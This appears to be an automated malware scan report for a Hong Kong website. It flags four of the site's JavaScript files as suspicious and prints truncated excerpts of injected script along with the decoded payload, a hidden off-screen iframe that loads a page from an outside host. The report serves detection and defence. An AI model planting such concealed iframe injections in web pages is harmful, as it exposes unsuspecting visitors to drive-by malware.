Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=s135.com.hk
Result: The website is marked by Google as suspicious; visiting this website may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.s135.com.hk/ | 200 OK Content-Length: 33508 Content-Type: text/html | clean |
http://www.s135.com.hk/templates/default/schinese/js/common.js | 200 OK Content-Length: 4025 Content-Type: application/javascript | suspicious |
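Suspicious code. Script contains iFrame: the decoded markup shown after the excerpt is a 134x134 frame positioned off-screen (left and top at -1284px), so the third-party page it points to loads without being visible to the visitor. The same decoded iFrame is reported for superMarquee.js, cycle.js and login.js on this page. The visible part of the excerpt also builds a list of User-Agent strings (probe_ua); the rest is skipped here, so how that list is used cannot be confirmed from this report.
(function(){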
function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var postindx = 0; if ((postindx = haystack.indexOf(needle, f_offset)) !== -1) { return postindx; } return false; } function funcionUA(){ var probe_ua = ['Lunascape','iPhone','Macintosh','Linux','iPad','Flock','SeaMonkey','Nokia','S ...[3182 bytes skipped]... Decoded script: <iframe name="Fulebraga" src="http://stratberi.antartidait.com.ar/gfjhregewgwehg19.html" style="position:absolute;left:-1284px;top:-1284px;" height="134" width="134"></iframe> | ||
http://www.s135.com.hk/templates/default/schinese/js/jquery-1.6.2.min.js | 200 OK Content-Length: 93620 Content-Type: application/javascript | clean |
http://www.s135.com.hk/templates/default/schinese/js/superMarquee.js | 200 OK Content-Length: 11280 Content-Type: application/javascript | suspicious |
Suspicious code. Script contains iFrame. (function(){
function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var postindx = 0; if ((postindx = haystack.indexOf(needle, f_offset)) !== -1) { return postindx; } return false; } function funcionUA(){ var probe_ua = ['Lunascape','iPhone','Macintosh','Linux','iPad','Flock','SeaMonkey','Nokia','S ...[4129 bytes skipped]... Decoded script: <iframe name="Fulebraga" src="http://stratberi.antartidait.com.ar/gfjhregewgwehg19.html" style="position:absolute;left:-1284px;top:-1284px;" height="134" width="134"></iframe> | ||
http://www.s135.com.hk/js/member.js | 200 OK Content-Length: 7372 Content-Type: application/javascript | clean |
http://www.s135.com.hk/templates/default/schinese/js/cycle.js | 200 OK Content-Length: 21075 Content-Type: application/javascript | suspicious |
Suspicious code. Script contains iFrame. (function(){
function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var postindx = 0; if ((postindx = haystack.indexOf(needle, f_offset)) !== -1) { return postindx; } return false; } function funcionUA(){ var probe_ua = ['Lunascape','iPhone','Macintosh','Linux','iPad','Flock','SeaMonkey','Nokia','S ...[3923 bytes skipped]... Decoded script: <iframe name="Fulebraga" src="http://stratberi.antartidait.com.ar/gfjhregewgwehg19.html" style="position:absolute;left:-1284px;top:-1284px;" height="134" width="134"></iframe> | ||
http://www.s135.com.hk/templates/default/schinese/js/global_login_form.php | 200 OK Content-Length: 813 Content-Type: text/html | clean |
http://www.s135.com.hk/test404page.js | HTTP/1.1 404 Not Found Connection: close Date: Fri, 30 Jan 2015 14:47:30 GMT Accept-Ranges: bytes ETag: "100000000a843-92b-4cc164db69200" Server: Apache/2.2.21 (Win32) PHP/5.3.8 Content-Length: 2347 Content-Type: text/html Last-Modified: Mon, 15 Oct 2012 10:14:32 GMT | clean |
http://www.s135.com.hk/templates/default/schinese/js/login.js | 200 OK Content-Length: 3893 Content-Type: application/javascript | suspicious |
Suspicious code. Script contains iFrame. (function(){
function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var postindx = 0; if ((postindx = haystack.indexOf(needle, f_offset)) !== -1) { return postindx; } return false; } function funcionUA(){ var probe_ua = ['Lunascape','iPhone','Macintosh','Linux','iPad','Flock','SeaMonkey','Nokia','S ...[3651 bytes skipped]... Decoded script: <iframe name="Fulebraga" src="http://stratberi.antartidait.com.ar/gfjhregewgwehg19.html" style="position:absolute;left:-1284px;top:-1284px;" height="134" width="134"></iframe> | ||
http://s19.cnzz.com/stat.php?id=3506239&web_id=3506239 | 200 OK Content-Length: 10072 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: s135.com.hk
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: s135.com.hk
Referer: http://www.google.com/search?q=s135.com.hk
Result:
The result is similar to the first query. No suspicious redirects were found.